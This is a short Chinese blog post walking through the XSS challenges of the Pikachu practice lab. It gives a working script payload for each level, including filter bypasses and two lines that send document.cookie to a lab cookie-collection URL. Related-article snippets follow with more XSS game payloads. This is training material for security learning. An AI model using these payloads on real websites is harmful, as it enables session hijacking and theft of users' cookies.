pikachu-xss部分速通

最新推荐文章于 2024-08-19 17:31:39 发布
最新推荐文章于 2024-08-19 17:31:39 发布
阅读量352 收藏
点赞数 1
分类专栏: 日常练习 文章标签: xss javascript 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46684679/article/details/128223354
版权

pikachu-xss部分速通

🍉

🍉目录

反射型xss(get)

payload:

</p><script>alert(1)</script><p>

请添加图片描述

反射性xss(post)

payload:

</p><script>var cookie = document.cookie;alert(cookie);</script><p>

请添加图片描述

存储型xss

payload:

<script>var cookie = document.cookie;alert(cookie);</script>

请添加图片描述

DOM型xss、DOM型xss-x

payload:

javascript:`${alert(1)}`
javascript:alert(2)
javascript:var cookie = document.cookie;alert(cookie);

请添加图片描述

xss盲打

先说下xss后台用法,如果构造一个请求为http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie=value
那后台就会写入一条cookie信息,相当于模拟了一个xss窃取用户cookie的过程
payload:

<script>document.location="http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie="+document.cookie</script>

请添加图片描述

请添加图片描述

xss之过滤

大写就能绕过
payload:

<SCRIPT>var cookie = document.cookie;alert(cookie);</SCRIPT>

xss之htmlspecialchars

别用特殊符号
payload:

javascript:var cookie = document.cookie;alert(cookie);

xss之href输出

paylaod:

javascript:document.location="http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie="+document.cookie

单击a标签后,后台是有cookie记录的

xss之js输出

payload:

'</script><script>alert(1)</script>

请添加图片描述

伽蓝之堂
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web应用安全:XSS盗取cookiepayload(实验习题).docx
06-17
Web应用安全:XSS盗取cookiepayload(实验习题).docx
xss收集cookie方法(以pikachu靶场举例)
weixin_59047731的博客
01-13 864
本文提到的收集cookie的后台页面来自于pikachu靶场,只是把它单独提出来弄成一个网站(完整安装皮卡丘的安装包中都有这个pkxss文件的)
pikachuxss如何获取cookie靶场,返回首页总是失败
山兔的博客
04-23 854
xcookie模块,在这个下面,有一个cookie.php文件,把他重定向的IP地址,改成你靶场的首页地址IP header("Location:http://192.168.1.4/pikachu/index.php"); 就可以了
使用pikachu管理工具下的XSS后台进行实战
北冥同学的成长记录笔记
07-29 3418
pikachu管理工具下的XSS后台是一个通过Cookie窃取和利用、钓鱼攻击、键盘行为记录这三个实战型实验来帮助学习者理解XSS漏洞的原理和危害的一个平台。旨在帮助学习者在实战中深入理解理论,从而可以更好的防御XSS漏洞。
pikachu-xss.txt
06-10
pikachu-xss
pikachu-master.zip
06-25
"Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让学习者在可控的环境中实践和测试各种安全攻防...
pikachu-master
05-04
将下载的pikachu-master压缩包解压到指定目录,如`/opt`: ``` sudo tar -zxvf pikachu-master.tar.gz -C /opt ``` 进入解压后的目录: ``` cd /opt/pikachu-master ``` 5. 配置Pikachu 使用文本编辑器...
xss靶场详解
网安小菜鸡的博客
08-18 854
somebody=在svg加载完成以后执行我们的xss代码。因为这次使用的是innertext,他会把我们的标签整个识别成一个字符串输出就不能用一开始的。因为他利用innerHTML直接更新somebody参数,所以我们可以利用。是一个构造函数,用于动态创建一个新的函数。用于立即调用刚刚创建的函数。方法将字符串中的所有字母。是一个正则表达式,用于。
xss.function靶场(hard)
丁航航的博客
08-18 458
目前啥也不输入,直接进入查看。
XSS-DOM
qq_51502737的博客
08-18 756
我们可以通过这种方式去创建或者覆盖 document 或者 window 对象的某些值,但是看起来我们举的例子只是利用标签创建或者覆盖最终得到的也是标签,是一个HTMLElment对象。可以明显的看到这是个DOM XSS,用户的输入会构成一个新div元素的子结点,但在插入body之前会被移除所有的属性。但是对于大多数情况来说,我们可能更需要将其转换为一个可控的字符串类型,以便我们进行操作。最内层的svg先触发,然后再到下一层,而且是在DOM树构建完成以前就触发了相关事件。先注释掉过滤代码,此时正常弹窗。
XSS总结知识点+例题实操
代码其实很简单
08-19 889
XSS也是属于注入攻击的一类,他是通过构造一个JS代码,注入到网页中,由用户的浏览器来请求源码且运行达到攻击的效果;2、XSS的危害3、XSS产生的原因4、反射性XSS5、存储型XSS6、DOM的XSS8、XSS的防御及修复9、XSS很多时候就是一边测试性的输入一边查看html源码,可以通过查看源码查看系统对我构造的js注入做了什么防御;10、XSS的绕过2、DOM型XSS --向源html码中插入代码,破坏源DOM因为我们js中也有tel,cid等这些关键字/函数,那么当你在前端用这些关键字/函数的时候
XSS-过滤特殊符号的正则绕过
2301_78549931的博客
08-17 962
结果为数字8680439也就是说我们利用parseInt函数将关键字变为一串数字,但数字肯定无法运行,我们还需要再变回去,要将一个数字转换为特定的。
portswigger的Exploiting DOM clobbering to enable XSS
banliyaoguai的博客
08-18 1469
我们开始是没有头像的所以我们开始会走到window.defaultAvatar上,所以只要我们想办法构造一个 defaultAvatar.avatar就可以进行XSS了。所以下面构造的时候1后面要加双引号但是加双引号的时候会出现问题,无法闭合,我们尝试是用HTML实体编码。然后是用一个小技巧,是用一个不存在的伪协议,然后这个伪协议不存在,后面"就不会被编码。DOM破坏肯定是要看js的我们打开源码查看一下,发现了如下图的代码。然后我们借助一个js特性,看下面两张图id相同时不同的值的取法。
什么是XSS跨站攻击?如何防护?
最新发布
encoding-console的博客
08-19 387
XSS攻击,即跨站脚本攻击(Cross-Site Scripting),是一种常见的网络安全威胁。其本质是通过在网页中注入恶意的脚本代码,当其他用户浏览这些网页时,浏览器会执行其中的恶意代码,从而达到攻击目的。
xss GAME (xss漏洞攻击1-8)
weixin_65785894的博客
08-18 797
构建一个ALERT(1337) source 是获取函数原码 toLowerCase() 获取小写。,原型为parseInt ( String s , [ int radix ] ),用于解析一个。alert 这个 t 必须到30进制才可以转换的到 例子:16进制最大是F。分析:innerText=ma 这个代码 将会把你输入的都将转换为文本。就是修改他原来的参数,进行覆盖,最后误以为是正确的。而且有需求,不能有用户参与,而且必须弹窗1337。分析源码可知,没有任何过滤,那直接动手操作即可。
XSS复现
nixiaoge的博客
08-18 847
XSS是一种网络安全漏洞,允许攻击者通过注入恶意脚本到网页中,影响用户。主要类型包括反射型XSS、DOM型XSS和CSS型XSS。防范措施包括输入验证、转义用户输入和使用HttpOnlyCookie。文章详细解释了各种XSS攻击的原理和防范方法。
XSS项目实战
qq_68389880的博客
08-17 819
innerText函数会将'<','>'进行实体编码转义;ok传入了,但是后面的函数值被删掉了,这是因为javascript对于DOMPurify框架来说是黑名单,我们需要找到这个框架对应的白名单;过滤了'(' ')' '`' '\';过滤了alert函数,可以选择切换为confirm函数,但是意义不大;这道题过滤了'<''>';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';
xss.pwnfunction靶场网站简单8道题练习
wzzzzz06的博客
08-18 1025
如图过滤了"" , " ’ " , ’ " ', " + " , " - " , "!" , " \ " , " [ " , " ] ",还有alert,但是()没有过滤,所以是可以使用函数的。F12在控制台尝试转换进制,发现29进制只显示aler,而30进制显示alert,这是因为16进制是0-F,而30进制刚好对应到字母T。当然,也可以利用JavaScript的特性,构造函数后面加()可以直接执行,Function()(),选择不传参,默认页面下发现OK找不到,回到上头发现有一个定时函数提到了OK。
XSS Game练习
Pu5073的博客
08-17 695
1.Ma Spaghet 直接get传参 ?somebody=aaaa 直接使用img标签 ?somebody=<img%20src=1%20onerror="alert(1337)"> 官方文档 应使用innertext,安全性更高 2.Jefff 通过代码可以知道是通过eval的代码执行,setTimeout中的内容表示在一秒后执行一次 危险方法为eval,用双引号闭合即可 ?jeff=";alert(1337);" or ?jeff=";-alert(1337);-" 3
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值